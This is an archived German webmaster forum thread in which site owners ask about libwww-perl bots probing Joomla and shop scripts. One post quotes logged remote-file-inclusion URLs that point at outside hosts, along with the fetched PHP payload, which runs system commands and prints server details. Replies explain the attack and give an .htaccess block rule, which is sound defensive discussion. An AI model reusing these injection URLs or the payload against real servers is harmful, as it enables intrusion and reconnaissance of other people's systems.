Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

LibWWW

Alles zum Thema: Robots, Spider, Logfile-Auswertung und Reports
Neues Thema Antworten
1aaaa
PostRank 5
PostRank 5
Beiträge: 281
Registriert: 25.02.2005, 00:02

Beitrag von 1aaaa » 25.09.2006, 16:10

Hi!

Ich habe heute auf einer Seite, auf der sich üblicherweise erst 3 oder 4 Besucher am Tag tummeln ca. 50 gehabt. Unterschiedliche Länder, unterschiedliche IPs. Einzige Gemeinsamkeit ist der Browser - "LibWWW" steht da. Übrigens, die Seite ist mit Joomla gemacht und ich habe die Zoom Gallery.

Es wurden immer Seiten wie
...component/option,com_zoom/Itemid,26/components/com_zoom/classes/fs_unix.php/
...component/option,com_zoom/Itemid,26/components/com_zoom/classes/fs_win32.php/
...component/option,com_zoom/Itemid,26/components/com_zoom/classes/fs_win32.php/
aufgerufen.

Was ist da im Busch? kann da jemand was mit anfangen? Übrigens gibt es die Seiten so nicht, man kommt so immer auf die Galerieübersicht, deren URL ich aber mit OpenSEF auf.../Galerie umgebaut habe.

Schönen Gruss.

Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.


Anonymous

Beitrag von Anonymous » 25.09.2006, 18:44

libWWW ist ein perl modul.... ich würde sagen da sucht ein script über proxys nach einer bestimmten schwachstelle....

1aaaa
PostRank 5
PostRank 5
Beiträge: 281
Registriert: 25.02.2005, 00:02

Beitrag von 1aaaa » 26.09.2006, 00:45

......... hmmmm.

ich glaub ich meld mich mal im joomlaforum an und frag da nach. hatte die tage auch schon 2 "useranmeldungen", obwohl das entsprechende modul gar nicht veröffentlicht war.


danke dir.

Viktor1982
PostRank 8
PostRank 8
Beiträge: 836
Registriert: 29.10.2008, 22:32

Beitrag von Viktor1982 » 10.11.2008, 11:03

Hallo ,

bei mir seid zwei Tagen das gleiche Problem , anscheinend sucht jemand eine Schwachstelle bei mir im Shop :bad-words:
Oder sehr wahrscheinlich nach dem Passwort.

Hat folgendes bei mir aufgerufen:

Hostname www.sitelift.de

//modules/mods_full/shopping_cart/includes/errors.php?error=https://fantalaranja.t35.com/idr0x.txt???

mit libWWW und die seite hat folgenden Inhalt:

<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}

return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "narasaon<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "narasaon was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

weiß den jamand was dies bedeutet

gestern das gleiche mit verschiedenen IPS

/?Language=https://www.viponline.com.br/alb.txt%3f

aber hat wohl seine spur verwischt hmmmmmmmmm


wie kann man libWWW komplett sperren in der .htaccess ?

Mork vom Ork
PostRank 9
PostRank 9
Beiträge: 2557
Registriert: 08.07.2008, 11:07
Wohnort: Aufm Friedhof.

Beitrag von Mork vom Ork » 10.11.2008, 11:39

Viktor1982 hat geschrieben:anscheinend sucht jemand eine Schwachstelle bei mir im Shop
Das ist nichts Besonderes. Lass' ihn suchen und seine Zeit verschwenden, denn du hast ja sicher immer aktuelle Software.
//modules/mods_full/shopping_cart/includes/errors.php?error=https://fantalaranja.t35.com/idr0x.txt???
Offensichtlich lässt (oder ließ) sich dein Skript errors.php mit dem Parameter error dazu verleiten, von irgendwo auf der Welt ein Skript runterzuladen und auszuführen. Sowas ist natürlich extrem dumm.
echo "narasaon was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

weiß den jamand was dies bedeutet
Das Skript spuckt lediglich ein paar erstmal unverfängliche Serverdaten aus: Betriebssystem, IP-Adresse, Plattenspeicher usw. Das Kürzel "pwd" bedeutet übrigens nicht "password", sondern steht für "print work(ing) directory", also das derzeitige Arbeitsverzeichnis.
wie kann man libWWW komplett sperren in der .htaccess ?
Das kannst du, aber dann sperrst du lediglich die Gelangweilten aus, die vor lauter Trübsinn sich nicht einmal dazu aufraffen konnten, libwww eine unverdächtigere Browserkennung übermitteln zu lassen - die sind keine Gefahr, die machen sich lediglich einen kleinen Spaß daraus, schlampige Seitenbetreiber, die aus Bequemlichkeit oder Unwissenheit auf Softwareupdates verzichten, bloßzustellen.

Aussperren kannst du Browser mittels Deny. Wenn du dort in der Anleitung dem Verweis zum Gegenstück Allow folgst, findest du ein fast passendes Beispiel.
Zuletzt geändert von Mork vom Ork am 10.11.2008, 11:40, insgesamt 1-mal geändert.

whyte
PostRank 6
PostRank 6
Beiträge: 367
Registriert: 10.05.2004, 09:40

Beitrag von whyte » 10.11.2008, 11:39

Code: Alles auswählen

RewriteEngine On

# block bad bots
RewriteCond %&#123;HTTP_USER_AGENT&#125; ^libwww-perl
RewriteRule ^.* - &#91;F,L&#93;
oder besser gleich mal die komplette Liste:
https://www.server-wissen.de/security/hi ... erren.html

Gruß
Marco

Viktor1982
PostRank 8
PostRank 8
Beiträge: 836
Registriert: 29.10.2008, 22:32

Beitrag von Viktor1982 » 10.11.2008, 11:47

Ja ich verwende eigentlich den sicheren Fork ,

Super Antwort und super Forum hat weitergeholfen Vielen Dank ! :lol:

Ice Man
PostRank 9
PostRank 9
Beiträge: 2477
Registriert: 04.06.2003, 19:16

Beitrag von Ice Man » 10.11.2008, 12:49

jo, den kenn ich.
Wer ein phpbb Forum hat, der wurde von dem schon oft besucht.
Der hat auch immer nach Schachstellen gesucht.
Oft nach den, die durch das neueste Sicherheitsupdate gefixt werden sollten.

Antworten